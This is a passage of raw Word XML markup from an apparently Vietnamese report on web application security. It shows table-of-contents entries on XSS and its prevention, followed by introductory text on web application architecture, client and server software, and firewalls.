                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44EC897D" w14:textId="3A121F12"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5" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.2.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ách phòng chố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5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19</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41635468" w14:textId="5802B548" w:rsidR="005E1B43" w:rsidRPr="005E1B43" w:rsidRDefault="005E1B43">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc59634026" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.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hèn mã lệnh thực thi trên trình duyệt nạn nhân (Cross Side Scripti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6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21</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AA9E503" w14:textId="1A6034F1"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7" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.3.1.</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Khái niệm</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7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21</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02C365A8" w14:textId="41F92802"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8" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.3.2.</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Phương pháp tấn công XSS truyền thố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8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22</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D1F8F09" w14:textId="7B6AAEB0"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29" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.3.3.</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Tấn công XSS bằng Flash</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29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23</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5EBF1E2B" w14:textId="49E48B54" w:rsidR="005E1B43" w:rsidRPr="005E1B43" w:rsidRDefault="005E1B43">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc59634030" w:history="1">
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.3.4.</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cách phòng chống</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc59634030 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F54066">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1B43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E862121" w14:textId="23134867" w:rsidR="005E1B43" w:rsidRDefault="005E1B43">
          <w:r w:rsidRPr="005E1B43">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="45FA987D" w14:textId="103D1AE8" w:rsidR="005E1B43" w:rsidRPr="005E1B43" w:rsidRDefault="005E1B43" w:rsidP="005E1B43">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="005E1B43" w:rsidRPr="005E1B43">
          <w:headerReference w:type="default" r:id="rId10"/>
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5412CD0A" w14:textId="61EFC237" w:rsidR="005A57B4" w:rsidRDefault="00407983" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc59634004"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Khái niệm cơ bản.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="27A17FA4" w14:textId="68AE04FD"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 w:name="_Toc59634005"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Khái niệm ứng dụng web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="4A599EFB" w14:textId="525B9349"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Ứng dụng Web là một ứng dụng chủ/khách sử dụng giao thức HTTP để tương tác với người dùng hay hệ thống khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675D71D9" w14:textId="3E8EE268"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Trình khách dành cho người sử dụng thường là một trình duyệt Web như Internet Explorer hay Netscape Navigator. Cũng có thể là một chương trình đóng vai trò đại    lý người dùng hoạt động như một trình duyệt tự động. Người dùng gửi và nhận các thông tin từ trình chủ thông qua việc tác động vào các trang Web. Các chương trình   có thể là các trang trao đổi mua bán, các diễn đàn, gửi nhận e-mail…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6E53FB" w14:textId="31D5AAEB"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Tốc độ phát triển các kỹ thuật xây dựng ứng dụng Web cũng phát triển rất nhanh. Trước đây những ứng dụng Web thường được xây dựng bằng CGI  (Common  Gateway Interface) được chạy trên các trình chủ Web và có thể kết nối vào các cơ sở dữ liệu đơn giản trên cùng máy chủ. Ngày nay ứng dụng Web thường được viết bằng Java (hay các ngôn ngữ tương tự) và chạy trên máy chủ phân tán, kết nối đến nhiều nguồn dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77023B6B" w14:textId="049FED1E" w:rsidR="008F4DA7" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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Một ứng dụng web thường có kiến trúc gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3A4401" w14:textId="7A88F8AB" w:rsidR="008F4DA7" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008F4DA7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C086213" wp14:editId="463BF144">
            <wp:extent cx="561022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610225" cy="2371725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06583E7E" w14:textId="69CDA123" w:rsidR="008F4DA7" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hình 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2F67">
        <w:t>Kiến trúc một ứng dụng Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B9388C" w14:textId="2F17A08F"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Lớp trình bày: Lớp này có nhiệm vụ hiển thị dữ liệu cho người dùng, ngoài ra còn có thể có thêm các ứng dụng tạo bố cục cho trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C39F693" w14:textId="7CBDB53B"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 xml:space="preserve">Lớp ứng dụng: là nơi xử lý của ứng dụng Web. Nó sẽ xử lý thông tin người dùng yêu cầu, đưa ra quyết định,  gửi kết quả đến “lớp trình bày”.  Lớp này thường   được cài </w:t>
      </w:r>
      <w:r w:rsidRPr="008F4DA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>đặt bằng các kỹ thuật lập trình như CGI, Java, .NET , PHP hay ColdFusion, được triển khai trên các trình chủ như IBM WebSphere, WebLogic, Apache, IIS…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E59EC76" w14:textId="5C942AD4"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Lớp dữ liệu: thường là các hệ quản trị dữ liệu (DBMS) chịu trách nhiệm quản lý các file dữ liệu và quyền sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA26830" w14:textId="2A9C416A" w:rsidR="008F4DA7" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>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Mô hình hóa hoạt động của một ứng dụng Web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5107FCE4" w14:textId="77777777" w:rsidR="008F4DA7" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008F4DA7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31C489D4" wp14:editId="04A38AE2">
            <wp:extent cx="47625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0" cy="2657475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AC475D" w14:textId="3B3BE1FB" w:rsidR="008F4DA7" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hình 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="001342AE">
        <w:t>Mô hình hoạt động của một ứng dụng Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4604ADAB" w14:textId="483C3632" w:rsidR="008F4DA7" w:rsidRPr="00E42092" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Trong đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8750F0" w14:textId="14F95300" w:rsidR="008F4DA7" w:rsidRPr="00E42092" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="741"/>
          <w:tab w:val="left" w:pos="742"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="153" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Trình khách ( hay còn gọi là trình duyệt): Internet Explorer, Netscap</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="39"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Navigator</w:t>
      </w:r>
      <w:r w:rsidR="002A4E11" w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E38DC88" w14:textId="29E4C21F" w:rsidR="008F4DA7" w:rsidRPr="00E42092" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="741"/>
          <w:tab w:val="left" w:pos="742"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="151" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Trình chủ: Apache, IIS,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5794EE" w14:textId="16A85638" w:rsidR="008F4DA7" w:rsidRPr="00E42092" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="741"/>
          <w:tab w:val="left" w:pos="742"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="151" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hệ quản trị cơ sở dữ liệu: SQL Server, MySQL, DB2,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Access…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFB5C45" w14:textId="0EA8E853" w:rsidR="008F4DA7" w:rsidRPr="00E42092" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="245" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="714"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bên cạnh đó, một giải pháp dùng để bảo vệ một hệ thống mạng thường được sử dụng là bức tường lửa, nó có vai trò như là lớp rào chắn bên ngoài một hệ thống mạng, vì chức năng chính của firewall là kiểm soát luồng thông tin giữa các máy tính. Có thể xem firewall như một bộ lọc thông tin, nó xác định và cho phép một máy tính này có được truy xuất đến một máy tính khác hay không, hay một mạng này có được truy  xuất đến mạng kia hay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B719D1E" w14:textId="20C226D7" w:rsidR="002A4E11" w:rsidRPr="00E42092" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Người ta thường dùng firewall vào mục đích:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEEA88B" w14:textId="21B22CE9" w:rsidR="008F4DA7" w:rsidRPr="00E42092" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="741"/>
          <w:tab w:val="left" w:pos="742"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="153" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cho phép hoặc cấm những dịch vụ truy xuất ra</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ngoài.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CB1337" w14:textId="5ED1C1D5" w:rsidR="008F4DA7" w:rsidRPr="00E42092" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="741"/>
          <w:tab w:val="left" w:pos="742"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="153" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42092">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cho phép hoặc cấm những dịch vụ từ bên ngoài truy nhập vào trong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE70CF" w14:textId="44E479C1" w:rsidR="008F4DA7" w:rsidRPr="00E42092" w:rsidRDefault="008F4DA7" w:rsidP="00E42092">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
